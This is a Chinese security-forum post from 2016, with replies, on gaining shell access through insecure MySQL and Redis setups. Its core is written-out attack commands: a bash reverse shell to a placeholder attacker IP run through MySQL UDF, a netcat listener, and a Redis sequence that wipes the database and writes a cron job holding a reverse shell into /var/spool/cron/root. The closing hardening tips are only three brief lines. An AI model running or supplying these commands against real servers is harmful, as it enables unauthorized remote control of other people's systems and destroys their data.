首页
社区
课程
招聘
[原创]不安全的数据库系列(1) mysql、redis不安全配置引发的getshell
发表于: 2016-11-11 11:24 1989

[原创]不安全的数据库系列(1) mysql、redis不安全配置引发的getshell

2016-11-11 11:24
1989
1.前言
web安全入门多是sql注入,xss。
几年前sql注入确实有很大的威胁,现在这样的技术几乎被玩烂了。
由于各种各样waf的存在,
硬件waf:绿盟等传统厂商的产品
软件waf:配置在apache,nginx等服务器的waf
数据库waf:druid等安全的连接池
代码级waf: 使用脚本语言实现的过滤器模式(discuz,ci中都有写好的正则严格过滤)
安全的代码编写规则:几乎普及的预编译查询

sql注入在大型java,php框架(j2ee,discuz,ci等)中几乎消失了。
由于大型网站性能需求,不许可架设waf,不许可使用写好的框架,但这样的网站多在云上(阿里云等),所以对sql注入也有一定的防御。
总之,小白的sql注入之路越发难走,大牛有各样的绕waf规则。
2.mysql getshell
假如发现了注入,该怎么利用呢?
传统思路:找后台->查管理员密码->写webshell->.......
由于站库分离,这种思路有严重局限性。
下面介绍mysql反弹shell:
通过udf执行系统命令
bash -i >& dev/tcp/xx.xx.xx.xx/XXXX 0>&1
本机监听
nc -nvlp XXXX
即可
3.redis getshell(redis没有sql注入风险)
先备份redis
然后
flushall
set 1 "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/xx.xx.xx.xx/XXXX 0>&1\n\n"
config set dir /var/spool/cron/
config set dbfilename root
save
写入corontab
最后清理,恢复数据库

4.mysql redis安全配置
1.不开放外网访问
2.使用低权限用户
3.禁用敏感命令

小白发帖,欢迎回帖交流

[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

收藏
免费 0
支持
分享
最新回复 (5)
雪    币: 50161
活跃值: (20610)
能力值: (RANK:350 )
在线值:
发帖
回帖
粉丝
2
期待后续的文章
2016-11-11 12:34
0
雪    币: 2375
活跃值: (433)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
3
禁用敏感命令,如何做到呢?
2016-11-11 12:35
0
雪    币: 35
活跃值: (167)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
4
居然敢说sql注入被玩烂了?sql的函数你了解多少,数据库特性你了解多少,还有正是有了waf才让对抗越来越有意思好吧。
2016-11-14 19:58
0
雪    币: 2375
活跃值: (433)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
5
你拿过几个站呢,亲
2016-11-16 13:27
0
雪    币: 346
活跃值: (45)
能力值: ( LV3,RANK:20 )
在线值:
发帖
回帖
粉丝
6
对大企业 基本都是 分级 分区集群架构 有多层fw 这些常用的玩法基本上跑不到后端执行 , 但国内大多是小企站 和个人站 所以还是有很多站中招的
2016-11-16 15:33
0
游客
登录 | 注册 方可回帖
返回
//